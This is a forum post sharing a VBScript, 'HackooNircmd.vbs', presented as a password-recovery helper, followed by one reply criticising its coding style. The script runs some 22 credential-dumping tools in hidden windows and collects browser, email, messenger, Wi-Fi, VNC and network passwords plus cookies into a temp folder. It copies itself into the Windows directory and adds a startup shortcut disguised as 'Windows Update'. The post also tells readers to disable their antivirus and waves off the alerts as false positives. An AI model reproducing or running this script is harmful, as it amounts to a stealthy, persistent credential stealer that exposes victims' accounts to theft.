Jump to content

Windows Password Recovery Tools + HackooNircmd.vbs


Hackoo
 Share

Recommended Posts

Hi ! ;)

I made this script named "HackooNircmd.vbs" to recover many passwords stored in many applications running with windows XP using some Windows Password Recovery Tools. The output results are in html Files.

How it works this script ?: You Must First Download this Password Recovery Tools at this link Password Recovery Tools and create a folder named passrecovery and copy all tools on it.

second:Download this utiliy Nircmd

the last thing is to open the notepad and copy and paste the Code below and save it as HackooNircmd.vbs and don't forget the Nircmd Utiliy and the folder passrecovery must be in same path of the script ;)

Be aware that some Antivirus programs might detect that these password recovery tools are infected with Virus/Trojan. All these Trojan/virus alerts are "False Positive" issues. If you want to test this script i advise you to desactive your Antivirus and your Antispyware.

NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface. By running NirCmd with simple command-line option, you can write and delete values and keys in the Registry, write values into INI file, dial to your internet account or connect to a VPN network, restart windows or shut down the computer, create shortcut to a file, change the created/modified date of a file, change your display settings, and more...

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE PassView: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more...

Dialupass : Password recovery tool that reveals all passwords stored in dial-up entries. (Internet and VPN connections) As opposed to many other tools, this tool works in all versions of Windows, including Windows 2000 and Windows XP.

Asterisk Logger : Recovers passwords stored behind asterisks (****) characters. You can use this tool to recover the passwords of many applications, like CuteFTP, CoffeeCup Free FTP, VNC, and more...

AsterWin IE : Reveals the passwords stored behind the asterisks in the web pages of Internet Explorer 5.0 and above. You can use it for recovering a lost web site password, if it's stored on your computer.

Network Password Recovery : Recover network passwords stored by Windows XP operating system.

SniffPass Password Sniffer : capture the passwords that pass through your network adapter, and display them on the screen instantly.

You can use this utility to recover lost Web/FTP/Email passwords.

PstPassword : Recovers lost password of Outlook PST file.

PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

ChromePass : ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time.

WirelessKeyView : WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP and by the 'WLAN AutoConfig' service of Windows Vista.

VNCPassView : VNCPassView is a small utility that recover the passwords stored by the VNC tool. It can recover 2 of passwords: password stored for the current logged-on user (HKEY_CURRENT_USER in the Registry), and password stored for the all users.

SkypeLogView: reads the log files created by Skype application, and displays the details of incoming/outgoing calls, chat messages, and file transfers made by the specified Skype account. You can select one or more items from the logs list, and then copy them to the clipboard, or export them into text/html/csv/xml file.

The code Source of "HackooNircmd.vbs" is :

'Main Program
Copier
Shortcut
'do
CMD
'wscript.sleep 432000000
'Loop
Function CMD()
on error resume next
Dim WshShell,Command,Command1,Command2,Command3,Command4,Command5,Command6,Command7, ​Command8,Command9,Command10,Command11,Command12,Command13
Dim Command14,Command15,Command16,Command17,dump
Dim Result,Result1,Result2,Result3,Result4,Result5,Result6,Result7,Result8,Result9,R ​esult10,Result11,Result12,Result13,Result14,fso,nircmd,Windir
Set fso = CreateObject("Scripting.FileSystemObject")
Set windir = FSO.GetSpecialFolder(0)
Set WshNetwork = CreateObject("WScript.Network")
Set WshShell=WScript.CreateObject("WScript.Shell")
NomMachine = WshNetwork.ComputerName
tmp = WshShell.ExpandEnvironmentStrings("%temp%")
f = tmp & "\" & NomMachine & "_" & Day(Now) & "_" & Month(Now) & "_" & Year(Now)
If Not(fso.FolderExists(f)) Then
fso.CreateFolder(f)
end if
dump = f & "\dump"
cible=windir & "\"
nircmd="nircmd.exe"
if (not fso.fileexists(windir & "\nircmd.exe")) then
        fso.copyfile nircmd , cible
        end if
if (Not fso.Folderexists(cible & "passrecovery")) then
    fso.CopyFolder "passrecovery", cible
    end if
    if (Not fso.Folderexists(dump)) then
    fso.CreateFolder dump
    end if
    'Command = "%COMSPEC% /C nircmd.exe execmd mkdir dump\~$sys.computername$"
    'Result = WshShell.Run(Command,0,True)
    Command1 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\mspass.exe /shtml""""  "&dump&"\IMClients.html"
    Command2 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\mailpv.exe /shtml""""  "&dump&"\mail.html"
    Command3 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\pspv.exe /shtml"""" "&dump&"\selected.html"
    Command4 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\iehv.exe /shtml"""" "&dump&"\history.html"
    Command5 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\ProduKey.exe /shtml"""" "&dump&"\ProductKey.html"
    Command6 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\iepv.exe /shtml"""" "&dump&"\IEPasswords.html"
    Command7 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\netpass.exe /shtml"""" "&dump&"\NetworkPasswords.html"
    Command8 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\pstpassword.exe /shtml"""" "&dump&"\PstPassword.html"
    Command9 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\cports.exe /shtml"""" "&dump&"\OpenPorts.html"
    Command10 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\awatch.exe /shtml"""" "&dump&"\NetworkAdapter.html"
    Command11 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\mzcv.exe /shtml"""" "&dump&"\MozillaCookies.html"
    Command12 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\wul.exe /shtml"""" "&dump&"\InstalledUpdates.html"
    Command13 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\strun.exe /shtml"""" "&dump&"\Startup.html"
    Command14 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\servimin.exe /shtml"""" "&dump&"\Services.html"
    Command15 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\WIFIKE.EXE /shtml"""" "&dump&"\WIFIKEY.html"
    Command16 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\ChromePass.exe /shtml"""" "&dump&"\ChromePass.html"
    Command17 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\SkypeLogView.exe /shtml"""" "&dump&"\SkypeLogView.html"
    Command18 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\PasswordFox.exe /shtml"""" "&dump&"\PasswordFox.html"
    Command19 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\VNCPassView.exe /shtml"""" "&dump&"\VNCPassView.html"
    Command20 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\dialupass.exe /shtml"""" "&dump&"\dialupass.html"
    Command21 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\MozillaHistoryView.exe /shtml"""" "&dump&"\MozillaHistoryView.html"
    Command22 = "%COMSPEC% /C nircmd.exe execmd .\passrecovery\MyLastSearch.exe /shtml"""" "&dump&"\MyLastSearch.html"
    
    Result1 = WshShell.Run(Command1,0,True)
    Result2 = WshShell.Run(Command2,0,True)
    Result3 = WshShell.Run(Command3,0,True)
    Result4 = WshShell.Run(Command4,0,True)
    Result5 = WshShell.Run(Command5,0,True)
    Result6 = WshShell.Run(Command6,0,True)
    Result7 = WshShell.Run(Command7,0,True)
    Result8 = WshShell.Run(Command8,0,True)
    Result9 = WshShell.Run(Command9,0,True)
    Result10 = WshShell.Run(Command10,0,True)
    Result11 = WshShell.Run(Command11,0,True)
    Result12 = WshShell.Run(Command12,0,True)
    Result13 = WshShell.Run(Command13,0,True)
    Result14 = WshShell.Run(Command14,0,True)
    Result15 = WshShell.Run(Command15,0,True)
    Result16 = WshShell.Run(Command16,0,True)
    Result17 = WshShell.Run(Command17,0,True)
    Result18 = WshShell.Run(Command18,0,True)
    Result19 = WshShell.Run(Command19,0,True)
    Result20 = WshShell.Run(Command20,0,True)
    Result21 = WshShell.Run(Command21,0,True)
    Result22 = WshShell.Run(Command22,0,True)
End Function

sub Shortcut
dim shell,startupPath,link,temp,FSO,nom,WshNetwork
Set Shell = CreateObject("WScript.Shell")
startupPath = Shell.SpecialFolders("startup")
Set FSO = WScript.CreateObject("Scripting.FileSystemObject")
windir=FSO.GetSpecialFolder(0)
Set link = Shell.CreateShortcut(startupPath & "\Windows Update.lnk")
link.Description = "Windows Update"
link.IconLocation = "explorer.exe, 0"
link.TargetPath = windir & "\HackooNircmd.vbs"
link.WorkingDirectory = windir
link.Save
end sub

sub Copier
Set fso = CreateObject("Scripting.FileSystemObject")
Set windir = FSO.GetSpecialFolder(0)
Cible=windir & "\"
if not (fso.fileexists(Cible & wscript.scriptfullname)) then
           Set f1 = fso.GetFile(wscript.scriptfullname)
           fso.copyfile f1 ,Cible
           end if
end sub  

Sub explorer()
Dim objFSO, objFolder, objShell, f, strDirectory ,tmp
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set WshNetwork = CreateObject("WScript.Network")
Set WshShell=WScript.CreateObject("WScript.Shell")
NomMachine = WshNetwork.ComputerName
tmp = WshShell.ExpandEnvironmentStrings("%temp%")
f = tmp & "\" & NomMachine & "_" & Day(Now) & "_" & Month(Now) & "_" & Year(Now)
dump = f & "\dump"
strDirectory = dump
'If Err.Number = vbEmpty Then
   Set objShell = CreateObject("WScript.Shell")
   objShell.run ("Explorer" & " " & strDirectory & "\")
' Else: WScript.echo "VBScript Error: " & Err.Number
'End If
End Sub

Link to comment
Share on other sites

Man that's some messy coding. non-declaration of variables. Overuse of Variables. Why have 22 commands and results when you do nothing with the results. The commands should be an array of 22. 99% of each command is the same, re-use.

Just saying it could use some cleaning up. Take a look at my switchblade code posted the forum for some ideas.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...